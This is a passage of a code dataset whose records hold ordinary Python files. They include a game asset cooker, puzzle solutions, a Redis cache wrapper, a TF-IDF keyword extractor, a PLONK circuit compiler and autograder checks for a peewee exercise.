log(_str):\n\tglobal log_str\n\tlog_str += (_str + '\\n')\n\tprint(_str)\n\ndef log_dashes(_str = ''):\n\tlog_dash_count = 80\n\tlog(' ' + ('-' * log_dash_count))\n\tif _str:\n\t\tlog(' ' + _str)\n\t\tlog(' ' + ('-' * log_dash_count))\n\ndef sizeof_fmt(num, suffix='B'):\n\tfor unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n\t\tif abs(num) < 1024.0:\n\t\t\treturn '%3.1f%s%s' % (num, unit, suffix)\n\t\tnum /= 1024.0\n\treturn '%.1f%s%s' % (num, 'Yi', suffix)\n\n# Log Functions\ndef log_paths(paths, header = ''):\n\tif (header):\n\t\tlog_dashes('\\t\\t' + header)\n\ti = 0\n\tcolumn_width = 0\n\tfor path in paths:\n\t\tif (len(path) > column_width):\n\t\t\tcolumn_width = len(path)\n\tcolumn_width += 5\n\tfor path in paths:\n\t\ti += 1\n\t\tpath_text = path.ljust(column_width)\n\t\tindex_text = (str(i) + '.').ljust(4)\n\t\tlog('\\t' + index_text + path_text)\n\tlog(' ')\n\t\t\t\ndef log_assets_if_not_empty(_type, assets, do_print_size, bPrint_id = False):\n\ttotal_size = 0\n\tif (assets):\n\t\tlog_dashes('\\t\\t' + _type)\n\t\ti = 0\n\t\tcolumn_width = 0\n\t\tfor asset in assets:\n\t\t\tif (len(asset.path) > column_width):\n\t\t\t\tcolumn_width = len(asset.path)\n\t\tcolumn_width += 5\n\t\tfor asset in assets:\n\t\t\ti += 1\n\t\t\ttotal_size += asset.bytes\n\t\t\tpath_text = asset.id.ljust(column_width) if bPrint_id else asset.path.ljust(column_width)\n\t\t\tsize_text = sizeof_fmt(asset.bytes)\n\t\t\tindex_text = (str(i) + '.').ljust(5)\n\t\t\tif (do_print_size):\n\t\t\t\tlog('\\t' + index_text + path_text + size_text)\n\t\t\telse:\n\t\t\t\tlog('\\t' + index_text + path_text)\n\t\tif (do_print_size):\n\t\t\tlog(('\\tTotal: ').ljust(column_width + 6) + sizeof_fmt(total_size))\n\t\tlog(' ')\n\treturn total_size\n\ndef log_asset_group_by_type(assets, do_print_size = True):\n\tfonts = []\n\tsounds = []\n\ttexts = []\n\ttextures = []\n\tfor asset in assets:\n\t\tif (asset.type == 'Font'):\n\t\t\tfonts.append(asset)\n\t\telif (asset.type == 'Sound'):\n\t\t\tsounds.append(asset)\n\t\telif (asset.type == 'Text'):\n\t\t\ttexts.append(asset)\n\t\telse:\n\t\t\ttextures.append(asset)\n\ttotal_size = 0\n\ttotal_size += log_assets_if_not_empty('FONTS', fonts, do_print_size)\n\ttotal_size += log_assets_if_not_empty('SOUNDS', sounds, do_print_size)\n\ttotal_size += log_assets_if_not_empty('TEXTS', texts, do_print_size)\n\ttotal_size += log_assets_if_not_empty('TEXTURES', textures, do_print_size)\n\treturn total_size\n\ndef log_asset_flat(assets, do_print_size = True, bPrint_id = False):\n\treturn log_assets_if_not_empty('ASSETS', assets, do_print_size, bPrint_id)\n\ndef get_sizeof_file(path):\n\treturn ' [' + sizeof_fmt(os.path.getsize(path)) + ']'\n\n# Args\ndef process_args():\n\tglobal assets_root_dir, cooked_path, mode\n\tscript_path_set = False\n\tassets_root_set = False\n\tcooked_path_set = False\n\tfor arg in sys.argv:\n\t\tif (arg == '--cook' or arg == '-c'):\n\t\t\tmode = Mode.Cook\n\t\telif not script_path_set:\n\t\t\tscript_path_set = True\n\t\telif not assets_root_set:\n\t\t\tassets_root_dir = arg\n\t\t\tassets_root_set = True\n\t\telif not cooked_path_set:\n\t\t\tcooked_path = arg\n\t\t\tcooked_path_set = True\n\tif not cooked_path_set or not assets_root_set:\n\t\tprint('Usage: <relative_manifest_path> <relative_cooked_path> [-c]')\n\t\tsys.exit()\n\n# Core\ndef init():\n\tglobal cooked_exists, backup_path\n\tcooked_exists = os.path.isfile(cooked_path)\n\tif cooked_exists:\n\t\tbackup_path = cooked_path + '.bak'\n\tlog('')\n\tcw = 17\n\tmanifest_names = []\n\tfor filename in glob.glob(assets_root_dir + '/*' + manifest_ext):\n\t\tmanifests.append(filename)\n\t\tmanifest_names.append(os.path.basename(filename))\n\tif not manifests:\n\t\tlog (' ERROR! No manifests found in [' + assets_root_dir + ']')\n\t\treturn False\n\tlog((' Manifests:').ljust(cw) + ': ' + (', '.join(manifest_names)))\n\tif (mode == Mode.Analyse):\n\t\tif (cooked_exists):\n\t\t\tlog((' Analysed').ljust(cw) + ': ' + cooked_path)\n\t\telse:\n\t\t\tlog((' Cook Target').ljust(cw) + ': ' + cooked_path)\n\telif (mode == Mode.Cook):\n\t\tif (cooked_exists):\n\t\t\tlog((' Backup').ljust(cw) + ': ' + backup_path)\n\t\tlog((' Cooking').ljust(cw) + ': ' + cooked_path)\n\treturn True\n\ndef load_asset_manifest(manifest_path):\n\tmanifest_name = os.path.basename(manifest_path)\n\tassets_in_manifest = []\n\twith open(manifest_path, 'r') as file:\n\t\tloaded_manifest = json.loads(file.read())\n\t\ta_types = ['textures', 'fonts', 'sounds', 'texts']\n\t\tfor a_type in a_types:\n\t\t\tif a_type in loaded_manifest:\n\t\t\t\tfor asset_id in loaded_manifest[a_type]:\n\t\t\t\t\tasset_path = assets_root_dir + '/' + asset_id\n\t\t\t\t\tif (os.path.isfile(asset_path)):\n\t\t\t\t\t\tassets_in_manifest.append(Asset(asset_type_map[a_type], asset_path, asset_id))\n\t\t\t\t\telse:\n\t\t\t\t\t\tassets_not_on_fs.append(asset_path)\n\tasset_set_ids = ['textureSets', 'soundSets']\n\tfor asset_set_id in asset_set_ids:\n\t\ta_type = asset_set_id.replace('Set', '')\n\t\tif asset_set_id in loaded_manifest:\n\t\t\tfor asset_set in loaded_manifest[asset_set_id]:\n\t\t\t\tcount = asset_set['count']\n\t\t\t\tfor i in range(0, count):\n\t\t\t\t\tfilename = str(i).zfill(2)\n\t\t\t\t\tpath_prefix = asset_set['pathPrefix'] + '/' if 'pathPrefix' in asset_set else ''\n\t\t\t\t\tasset_prefix = asset_set['assetPrefix'] if 'assetPrefix' in asset_set else ''\n\t\t\t\t\tasset_suffix = asset_set['assetSuffix'] if 'assetSuffix' in asset_set else ''\n\t\t\t\t\tasset_id = path_prefix + asset_prefix + filename + asset_suffix\n\t\t\t\t\tasset_path = assets_root_dir + '/' + asset_id\n\t\t\t\t\tif (os.path.isfile(asset_path)):\n\t\t\t\t\t\tassets_in_manifest.append(Asset(asset_type_map[a_type], asset_path, asset_id))\n\t\t\t\t\telse:\n\t\t\t\t\t\tassets_not_on_fs.append(asset_path)\n\t\tif (os.path.isfile(cooked_path)):\n\t\t\twith zipfile.ZipFile(cooked_path, 'r') as archive:\n\t\t\t\t\tfor asset in assets_in_manifest:\n\t\t\t\t\t\tif asset.id in archive.namelist():\n\t\t\t\t\t\t\tassets_in_cooked.append(asset)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tassets_not_in_cooked.append(asset)\n\t\telse:\n\t\t\tassets_not_in_cooked.extend(assets_in_manifest)\n\tassets_to_cook.append(Asset('Manifest', manifest_path, manifest_name))\n\tassets_in_manifests.extend(assets_in_manifest)\n\ndef log_summary():\n\t# Manifest Crawl\n\tlog(' \\n\\t\\t\\tASSETS IN MANIFEST(s)')\n\ttotal = log_asset_group_by_type(assets_in_manifests)\n\tlog('\\tSum Total: ' + sizeof_fmt(total))\n\t# Missing files\n\tif (assets_not_on_fs):\n\t\tlog(' ')\n\t\tlog_paths(assets_not_on_fs, ' ERROR: ASSETS MISSING FROM FILESYSTEM!')\n\t# Orphaned\n\tif (assets_only_in_cooked):\n\t\tlog('')\n\t\tlog_paths(assets_only_in_cooked, ' ORPHANED ASSETS (will no longer be in ' + cooked_path + ')')\n\t# Cook List\n\tif mode == Mode.Analyse:\n\t\tif assets_in_cooked:\n\t\t\tif (cooked_exists and assets_not_in_cooked):\n\t\t\t\tlog(' \\n\\t\\t\\tNEW ASSETS')\n\t\t\t\tlog_asset_group_by_type(assets_not_in_cooked)\n\t\t\tlog(' \\n\\t\\t\\tEXISTING ASSETS (will be overwritten)')\n\t\t\tlog_asset_group_by_type(assets_in_cooked, False)\n\t\tlog(' \\n\\t\\t\\tASSETS TO COOK')\n\telse:\n\t\tlog(' \\n\\t\\t\\tASSETS COOKED')\n\tlog_asset_flat(assets_to_cook, True, True)\n\ndef pre_cook():\n\tglobal assets_to_cook, assets_in_manifests, assets_in_cooked, assets_not_in_cooked, cooked_exists\n\tif cooked_exists:\n\t\twith zipfile.ZipFile(cooked_path, 'r') as archive:\n\t\t\tfor asset_id in archive.namelist():\n\t\t\t\tif (asset_id.endswith('/') or asset_id.endswith('\\\\')):\n\t\t\t\t\tcontinue\n\t\t\t\tfound = False\n\t\t\t\tfor asset in assets_in_manifests:\n\t\t\t\t\tif (asset_id == asset.id):\n\t\t\t\t\t\tfound = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif (not found) and (manifest_ext not in asset_id):\n\t\t\t\t\tassets_only_in_cooked.append(asset_id)\n\tassets_in_manifests = list(set(assets_in_manifests))\n\tassets_in_manifests.sort(key = lambda x: x.id)\n\tassets_in_manifests.sort(key = lambda x: x.type)\n\tassets_in_cooked = list(set(assets_in_cooked))\n\tassets_in_cooked.sort(key = lambda x: x.id)\n\tassets_in_cooked.sort(key = lambda x: x.type)\n\tassets_not_in_cooked = list(set(assets_not_in_cooked))\n\tassets_not_in_cooked.sort(key = lambda x: x.id)\n\tassets_not_in_cooked.sort(key = lambda x: x.type)\n\tassets_to_cook.extend(assets_in_manifests)\n\tassets_to_cook = list(set(assets_to_cook))\n\tassets_to_cook.sort(key = lambda x: x.id)\n\tassets_to_cook.sort(key = lambda x: x.type)\n\ndef cook():\n\tif cooked_exists:\n\t\tif (os.path.isfile(backup_path)):\n\t\t\tos.remove(backup_path)\n\t\tos.rename(cooked_path, backup_path)\n\twith zipfile.ZipFile(cooked_path, 'w', zipfile.ZIP_DEFLATED, True) as zipF:\n\t\tcount = 0\n\t\tlog('')\n\t\tfor asset in assets_to_cook:\n\t\t\tcount += 1\n\t\t\tzipF.write(asset.path, asset.id)\n\t\t\tlog((' ' + str(count) + '. ').ljust(7) + ('[' + sizeof_fmt(asset.bytes) + ']').ljust(13) + asset.id)\n\t\tlog('')\n\ndef call():\n\tglobal mode\n\tmode = Mode.Cook\n\treturn run()\n\ndef run():\n\tif not init():\n\t\treturn False\n\tfor manifest in manifests:\n\t\tload_asset_manifest(manifest)\n\tpre_cook()\n\tif (assets_not_on_fs):\n\t\tif (mode == Mode.Analyse):\n\t\t\tlog('\\n ERROR: Invalid manifest entries / missing files! Attempt to cook will fail!')\n\t\telse:\n\t\t\tlog('\\n ERROR: Invalid manifest entries / missing files! Cook aborted!')\n\t\treturn False\n\tif (mode == Mode.Cook):\n\t\tcook()\n\t\tlog((' Cook Completed').ljust(20) + ': ' + cooked_path + get_sizeof_file(cooked_path))\n\t\tif (backup_path):\n\t\t\tlog((' Back up').ljust(20) + ': ' + backup_path + get_sizeof_file(backup_path))\n\telse:\n\t\tlog_summary()\n\t\tif (cooked_exists):\n\t\t\tlog((' Analysed').ljust(20) + ': ' + cooked_path + get_sizeof_file(cooked_path))\n\t\tsuffix = ' '\n\t\tif (os.path.isfile(cooked_path)):\n\t\t\tsuffix = ' and overwrite '\n\t\tprint('\\n Analysis complete. Run again with -c (--cook) to generate' + suffix + cooked_path)\n\treturn True\n\nif (__name__ == '__main__'):\n\tprocess_args()\n\trun()\n","repo_name":"karnkaul/LittleEngine","sub_path":"Tools/asset_cooker.py","file_name":"asset_cooker.py","file_ext":"py","file_size_in_byte":10132,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"27581744171","text":"path = 'Advent_of_Code/2017/puzzle_input/06.txt'\n\nwith open(path) as input:\n blocks = [int(x) for x in input.read().split()]\n \nvisited = dict()\ncycles = 0\nloop_detected = False\n\nwhile not loop_detected:\n visited[tuple(blocks)] = cycles\n cycles += 1\n\n qty = max(blocks)\n pos = blocks.index(qty)\n blocks[pos] -= qty\n for i in range(qty):\n blocks[(pos + 1 + i) % 16] += 1\n\n if tuple(blocks) in visited:\n loop_detected = cycles\n\nloop_size = loop_detected - visited[tuple(blocks)]\n\nprint(f'Part 1: {loop_detected}')\nprint(f'Part 2: {loop_size}')","repo_name":"mgtezak/Advent_of_Code","sub_path":"2017/Day_06.py","file_name":"Day_06.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4762447272","text":"from twill.errors import TwillAssertionError\nfrom agilo.test import Usernames\n\nfrom agilo.test.functional import AgiloFunctionalTestCase\nfrom trac.tests.functional import tc\n\n\nclass TestBugReporting(AgiloFunctionalTestCase):\n \"\"\" Test that when an exception occurs in the Agilo code\n the bug reporting system uses the Agilo bug tracking system\n for reporting the bug instead of the default Trac instance\n \"\"\"\n\n def should_be_skipped(self):\n import os\n return ((os.name == 'nt')) or (self.super())\n\n\n def runTest(self):\n self.tester.login_as(Usernames.admin)\n tc.go(\"backlog/Sprint%20Backlog?bscope=non-existing-sprint\")\n tc.code(500)\n tc.find(\"Invalid Sprint name\")\n try:\n tc.notfind(\"trac.edgewall.org/newticket\")\n except TwillAssertionError:\n raise Exception(\"Found a link to the official trac bug tracking platform\")\n\n tc.find(\"trac-hacks.org/newticket\")\n\n\nif __name__ == '__main__':\n from agilo.test.testfinder import run_all_tests\n run_all_tests(__file__)\n\n","repo_name":"djangsters/agilo","sub_path":"functional_tests/bug_reporting_test.py","file_name":"bug_reporting_test.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73268182881","text":"import cv2\nimport numpy as np\nfrom websocket import create_connection\n\nSERVER_IP = \"172.0.0.1\"\n\ndef display_frame(frame_data):\n np_arr = np.frombuffer(frame_data, np.uint8)\n frame = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n cv2.imshow(\"Webcam Streaming\", image)\n cv2.waitKey(1)\n\n\ndef main():\n url = f\"ws://{SERVER_IP}:8080/video_feed\"\n ws = create_connection(url)\n\n try:\n while True:\n ws.send(\"next_frame\")\n frame_data = ws.recv()\n display_frame(frame_data)\n finally:\n ws.close()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alexandremendoncaalvaro/webcam-ip","sub_path":"examples/wsl-webcam-capture-example/get_camera_streaming.py","file_name":"get_camera_streaming.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"20952056253","text":"import logging\nimport pickle\nimport uuid\nfrom collections.abc import MutableMapping\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_cache():\n \"\"\"Return the cache.\n\n This method returns an instance of :class:`~RedisCache` if a Redis server\n is available, or otherwise an instance of :class:`dict` for an in-memory\n cache.\n\n Returns\n -------\n cache\n An instance of :class:`~_RedisCache` if redis-server is available,\n otherwise a dict.\n\n \"\"\"\n try:\n import redis\n\n REDIS = True\n except ImportError as error:\n logger.debug(str(error))\n REDIS = False\n if REDIS:\n try:\n # try to connect to server\n cache = redis.Redis()\n test_key = str(uuid.uuid4())\n cache.set(test_key, 0)\n if cache.get(test_key) != b\"0\": # Redis stores data as bytes\n raise RuntimeError(\"Cache access check failed.\")\n cache.delete(test_key)\n logger.info(\"Using Redis cache.\")\n return _RedisCache(cache)\n except (redis.exceptions.ConnectionError, RuntimeError) as error:\n logger.debug(str(error))\n logger.info(\"Redis not available.\")\n return {}\n\n\nclass _RedisCache(MutableMapping):\n \"\"\"Redis-based cache.\n\n Redis restricts the types of data it can handle to bytes, strings, or\n numbers, and it always returns responses as bytes. The RedisCache is a\n :class:`~collections.abc.MutableMapping` that provides a convenient wrapper\n around instances of :class:`redis.Redis`, handling conversions to and from\n the appropriate data types.\n \"\"\"\n\n def __init__(self, client):\n self._client = client\n\n def __setitem__(self, key, value):\n self._client[key] = pickle.dumps(value)\n\n def __getitem__(self, key):\n return pickle.loads(self._client[key])\n\n def __delitem__(self, key):\n self._client.delete(key)\n\n def __contains__(self, key):\n return key in self._client\n\n def __iter__(self):\n for key in self._client.keys():\n yield key.decode()\n\n def __len__(self):\n return len(self._client.keys())\n","repo_name":"glotzerlab/synced_collections","sub_path":"synced_collections/_caching.py","file_name":"_caching.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"15448294729","text":"import math\nimport jieba\nimport jieba.posseg as psg\nimport functools\nimport numpy as np\n\n\nclass Tf_Idf(object):\n def __init__(self, idf_dic, default_idf, word_list, keyword_num):\n \"\"\"\n\n :param idf_dic: trained idf dictionary\n :param default_idf: default idf dictionary\n :param word_list: processed document for selecting important words\n :param keyword_num: number of the importance words\n \"\"\"\n self.idf_dic, self.default_idf = idf_dic, default_idf\n self.word_list = word_list\n self.tf_dic = self.get_tf_dic() # calculate the tf value\n self.keyword_num = keyword_num\n\n def get_tf_dic(self):\n # calculate the tf value\n tf_dic = {}\n for word in self.word_list:\n tf_dic[word] = tf_dic.get(word, 0.0) + 1.0\n tt_count = len(self.word_list)\n for k, v in tf_dic.items():\n tf_dic[k] = float(v) / tt_count\n return tf_dic\n\n def get_tfidf(self):\n # calculate the tf-idf value\n tfidf_dic = {}\n for word in self.word_list:\n idf = self.idf_dic.get(word, self.default_idf)\n tf = self.tf_dic.get(word, 0)\n tfidf = tf * idf\n tfidf_dic[word] = tfidf\n tfidf_dic.items()\n k_word = []\n for k, v in sorted(tfidf_dic.items(), key=functools.cmp_to_key(cmp), reverse=True)[:self.keyword_num]:\n k_word.append(k)\n\n return k_word\n\n\ndef get_stopword_list():\n stop_word_path = 'api/stopword.txt'\n stopword_list = [sw.replace('\\n', '') for sw in open(stop_word_path, encoding=\"utf-8\").readlines()]\n return stopword_list\n\n\n# token\ndef seg_to_list(sentence, pos=False):\n \"\"\"\n\n :param sentence:\n :param pos: if mark the lexical category\n :return:\n \"\"\"\n if not pos:\n seg_list = jieba.cut(sentence)\n else:\n seg_list = psg.cut(sentence)\n return seg_list\n\n\n# filter the interruption\ndef word_filter(seg_list, pos=False):\n \"\"\"\n\n 1: filter according to the token result\n 2: consider whether to filter other lexical category than nouns according to @param pos\n 3: judge whether in stop_word_list and the length\n \"\"\"\n stopword_list = get_stopword_list()\n filter_list = []\n for seg in seg_list:\n if not pos:\n word = seg\n flag = 'n' # if pos=False, all the words are marked as 'nouns' and kept\n else:\n word = seg.word\n flag = seg.flag\n if not flag.startswith('n'):\n continue\n if not word in stopword_list and len(word) > 1:\n filter_list.append(word)\n return filter_list\n\n\n# load the dataset, do tokenization and filter\ndef load_data(pos=False, corpus_path='api/corpus.txt'):\n \"\"\"\n process the dataset, after it only interference words remain in each doc\n :param pos: if mark the word\n :param corpus_path: path to dataset\n :return:\n \"\"\"\n doc_list = []\n for line in open(corpus_path, 'r', encoding=\"utf-8\"):\n content = line.strip() # get data of each line\n seg_list = seg_to_list(content, pos) # tokenization\n filter_list = word_filter(seg_list, pos) # filter the stopword\n doc_list.append(filter_list)\n return doc_list\n\n\ndef train_idf(doc_list):\n \"\"\"\n\n generate the IDF dictionary according to 'doc_list' for get 'TF-IDF' later\n \"\"\"\n idf_dic = {}\n tt_count = len(doc_list) # total count of doc in doc_list\n # count the number of occurrences of each word in the doc\n for doc in doc_list:\n for word in set(doc):\n idf_dic[word] = idf_dic.get(word, 0.0) + 1.0\n # transform to idf value and add 1 to dominator for flatten process\n for k, v in idf_dic.items():\n idf_dic[k] = math.log(tt_count / (v + 1.0))\n # for those which doesnt occur in the dictionary, by default its best to appear in a document and get the default\n # idf value\n default_idf = math.log(tt_count / 1.0)\n return idf_dic, default_idf\n\n\ndef tfidf_extract(word_list, pos=False, keyword_num=5):\n doc_list = load_data(pos)\n idf_dic, default_idf = train_idf(doc_list)\n tfidf_model = Tf_Idf(idf_dic, default_idf, word_list, keyword_num)\n return tfidf_model.get_tfidf()\n\n\ndef cmp(e1, e2):\n res = np.sign(e1[1] - e2[1])\n if res != 0: # sort by importance value\n return res\n else: # if the numbers equal, sort by word\n a = e1[0] + e2[0]\n b = e2[0] + e1[0]\n if a > b:\n return 1\n elif a == b:\n return 0\n else:\n return -1\n","repo_name":"sumaaail/Daily-life","sub_path":"api/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"623575738","text":"####Escribir un programa que pida valores y los añada a una lista hasta que el usuario pulse la\n####letra ‘q’. Con esa lista introducida por el usuario y haciendo uso de una función, elimine los\n####repetidos en esa lista. Luego nos muestre la lista inicialmente y la lista sin los repetidos.\n\ndef eliminar(num1,num2):\n for i in num1:\n if i not in num2:\n num2.append(i)\n\nrepetir = True\nlista1 = []\nlista2 = []\n\n\n\nwhile repetir:\n dato1 = input(\"Introduce un nº('q' para salir: \")\n lista1.append(dato1)\n if dato1 == \"q\":\n repetir = False\n \nlista1.pop(-1)\n\neliminar(lista1,lista2)\n\nprint(\"La lista inicial es:\",lista1,\"\\nLa lista final es:\",lista2)\n","repo_name":"Javiercc1988/Python_practica_funciones","sub_path":"valores_repetidos.py","file_name":"valores_repetidos.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30505061318","text":"# A simple zk language, reverse-engineered to match https://zkrepl.dev/ output\n\nfrom utils import *\nfrom .assembly import *\nfrom .utils import *\nfrom typing import Optional, Set\nfrom poly import Polynomial, Basis\n\n\n@dataclass\nclass CommonPreprocessedInput:\n \"\"\"Common preprocessed input\"\"\"\n\n group_order: int\n # q_M(X) multiplication selector polynomial\n QM: Polynomial\n # q_L(X) left selector polynomial\n QL: Polynomial\n # q_R(X) right selector polynomial\n QR: Polynomial\n # q_O(X) output selector polynomial\n QO: Polynomial\n # q_C(X) constants selector polynomial\n QC: Polynomial\n # S_σ1(X) first permutation polynomial S_σ1(X)\n S1: Polynomial\n # S_σ2(X) second permutation polynomial S_σ2(X)\n S2: Polynomial\n # S_σ3(X) third permutation polynomial S_σ3(X)\n S3: Polynomial\n\n\nclass Program:\n constraints: list[AssemblyEqn]\n group_order: int\n\n def __init__(self, constraints: list[str], group_order: int):\n if len(constraints) > group_order:\n raise Exception(\"Group order too small\")\n assembly = [eq_to_assembly(constraint) for constraint in constraints]\n self.constraints = assembly\n self.group_order = group_order\n\n def common_preprocessed_input(self) -> CommonPreprocessedInput:\n L, R, M, O, C = self.make_gate_polynomials()\n S = self.make_s_polynomials()\n return CommonPreprocessedInput(\n self.group_order,\n M,\n L,\n R,\n O,\n C,\n S[Column.LEFT],\n S[Column.RIGHT],\n S[Column.OUTPUT],\n )\n\n @classmethod\n def from_str(cls, constraints: str, group_order: int):\n lines = [line.strip() for line in constraints.split(\"\\n\")]\n return cls(lines, group_order)\n\n def coeffs(self) -> list[dict[Optional[str], int]]:\n return [constraint.coeffs for constraint in self.constraints]\n\n def wires(self) -> list[GateWires]:\n return [constraint.wires for constraint in self.constraints]\n\n def make_s_polynomials(self) -> dict[Column, Polynomial]:\n # For each variable, extract the list of (column, row) positions\n # where that variable is used\n variable_uses: dict[Optional[str], Set[Cell]] = {None: set()}\n for row, constraint in enumerate(self.constraints):\n for column, value in zip(Column.variants(), constraint.wires.as_list()):\n if value not in variable_uses:\n variable_uses[value] = set()\n variable_uses[value].add(Cell(column, row))\n\n # Mark unused cells\n for row in range(len(self.constraints), self.group_order):\n for column in Column.variants():\n variable_uses[None].add(Cell(column, row))\n\n # For each list of positions, rotate by one.\n #\n # For example, if some variable is used in positions\n # (LEFT, 4), (LEFT, 7) and (OUTPUT, 2), then we store:\n #\n # at S[LEFT][7] the field element representing (LEFT, 4)\n # at S[OUTPUT][2] the field element representing (LEFT, 7)\n # at S[LEFT][4] the field element representing (OUTPUT, 2)\n\n S_values = {\n Column.LEFT: [Scalar(0)] * self.group_order,\n Column.RIGHT: [Scalar(0)] * self.group_order,\n Column.OUTPUT: [Scalar(0)] * self.group_order,\n }\n\n for _, uses in variable_uses.items():\n sorted_uses = sorted(uses)\n for i, cell in enumerate(sorted_uses):\n next_i = (i + 1) % len(sorted_uses)\n next_column = sorted_uses[next_i].column\n next_row = sorted_uses[next_i].row\n S_values[next_column][next_row] = cell.label(self.group_order)\n\n S = {}\n S[Column.LEFT] = Polynomial(S_values[Column.LEFT], Basis.LAGRANGE)\n S[Column.RIGHT] = Polynomial(S_values[Column.RIGHT], Basis.LAGRANGE)\n S[Column.OUTPUT] = Polynomial(S_values[Column.OUTPUT], Basis.LAGRANGE)\n\n return S\n\n # Get the list of public variable assignments, in order\n def get_public_assignments(self) -> list[Optional[str]]:\n coeffs = self.coeffs()\n o = []\n no_more_allowed = False\n for coeff in coeffs:\n if coeff.get(\"$public\", False) is True:\n if no_more_allowed:\n raise Exception(\"Public var declarations must be at the top\")\n var_name = [x for x in list(coeff.keys()) if \"$\" not in str(x)][0]\n if coeff != {\"$public\": True, \"$output_coeff\": 0, var_name: -1}:\n raise Exception(\"Malformatted coeffs: {}\", format(coeffs))\n o.append(var_name)\n else:\n no_more_allowed = True\n return o\n\n # Generate the gate polynomials: L, R, M, O, C,\n # each a list of length `group_order`\n def make_gate_polynomials(\n self,\n ) -> tuple[Polynomial, Polynomial, Polynomial, Polynomial, Polynomial]:\n L = [Scalar(0) for _ in range(self.group_order)]\n R = [Scalar(0) for _ in range(self.group_order)]\n M = [Scalar(0) for _ in range(self.group_order)]\n O = [Scalar(0) for _ in range(self.group_order)]\n C = [Scalar(0) for _ in range(self.group_order)]\n for i, constraint in enumerate(self.constraints):\n gate = constraint.gate()\n L[i] = gate.L\n R[i] = gate.R\n M[i] = gate.M\n O[i] = gate.O\n C[i] = gate.C\n return (\n Polynomial(L, Basis.LAGRANGE),\n Polynomial(R, Basis.LAGRANGE),\n Polynomial(M, Basis.LAGRANGE),\n Polynomial(O, Basis.LAGRANGE),\n Polynomial(C, Basis.LAGRANGE),\n )\n\n # Attempts to \"run\" the program to fill in any intermediate variable\n # assignments, starting from the given assignments. Eg. if\n # `starting_assignments` contains {'a': 3, 'b': 5}, and the first line\n # says `c <== a * b`, then it fills in `c: 15`.\n def fill_variable_assignments(\n self, starting_assignments: dict[Optional[str], int]\n ) -> dict[Optional[str], int]:\n out = {k: Scalar(v) for k, v in starting_assignments.items()}\n out[None] = Scalar(0)\n for constraint in self.constraints:\n wires = constraint.wires\n coeffs = constraint.coeffs\n in_L = wires.L\n in_R = wires.R\n output = wires.O\n out_coeff = coeffs.get(\"$output_coeff\", 1)\n product_key = get_product_key(in_L, in_R)\n if output is not None and out_coeff in (-1, 1):\n new_value = (\n Scalar(\n coeffs.get(\"\", 0)\n + out[in_L] * coeffs.get(in_L, 0)\n + out[in_R] * coeffs.get(in_R, 0) * (1 if in_R != in_L else 0)\n + out[in_L] * out[in_R] * coeffs.get(product_key, 0)\n )\n * out_coeff\n ) # should be / but equivalent for (1, -1)\n if output in out:\n if out[output] != new_value:\n raise Exception(\n \"Failed assertion: {} = {}\".format(out[output], new_value)\n )\n else:\n out[output] = new_value\n # print('filled in:', output, out[output])\n return {k: v.n for k, v in out.items()}\n","repo_name":"0xPARC/plonkathon","sub_path":"compiler/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"54"} +{"seq_id":"15942813696","text":"import peewee # type: ignore\nfrom wincpy.checks.utils import StandardChecks\n\n__winc_id__ = \"286787689e9849969c326ee41d8c53c4\"\n\n\ndef check_db_init(student_module):\n \"\"\"The database can be initialized properly\"\"\"\n setup_data(student_module.models)\n\n\ndef check_cheapest_dish(student_module):\n \"\"\"`cheapest_dish` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.cheapest_dish, n_params=0)\n StandardChecks.n_params(student_module.models.Dish.select, n_params=1)\n\n dish = student_module.cheapest_dish()\n expected_dish = (\n student_module.models.Dish.select()\n .order_by(student_module.models.Dish.price_in_cents)\n .first()\n )\n assert dish == expected_dish, f\"Expected the cheapest dish to be {expected_dish}.\"\n assert type(dish) == type(\n expected_dish\n ), f\"Expected the cheapest dish to be {expected_dish}.\"\n\n\ndef check_vegetarian_dishes(student_module):\n \"\"\"`vegetarian_dishes` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.vegetarian_dishes, n_params=0)\n StandardChecks.n_params(student_module.models.Dish.select, n_params=1)\n\n dishes = student_module.vegetarian_dishes()\n expected_dishes = set(\n [\n dish\n for dish in student_module.models.Dish.select()\n if all([i.is_vegetarian for i in dish.ingredients])\n ]\n )\n assert (\n set(dishes) == expected_dishes\n ), f\"Expected vegetarian dishes to be {expected_dishes}\"\n\n\ndef check_best_restaurant(student_module):\n \"\"\"`best_average_rating` is implemented correctly\"\"\"\n StandardChecks.n_params(student_module.best_average_rating, n_params=0)\n\n restaurant = student_module.best_average_rating()\n expected_restaurant = (\n student_module.models.Restaurant.select(\n student_module.models.Restaurant,\n peewee.fn.AVG(student_module.models.Rating.rating).alias(\"average\"),\n )\n .join(student_module.models.Rating)\n .group_by(student_module.models.Restaurant)\n .order_by(peewee.fn.AVG(student_module.models.Rating.rating).desc())\n .first()\n )\n assert (\n restaurant == expected_restaurant\n ), f\"Expected the best restaurant to be {expected_restaurant}\"\n assert type(restaurant) == type(\n expected_restaurant\n ), f\"Expected the best restaurant to be 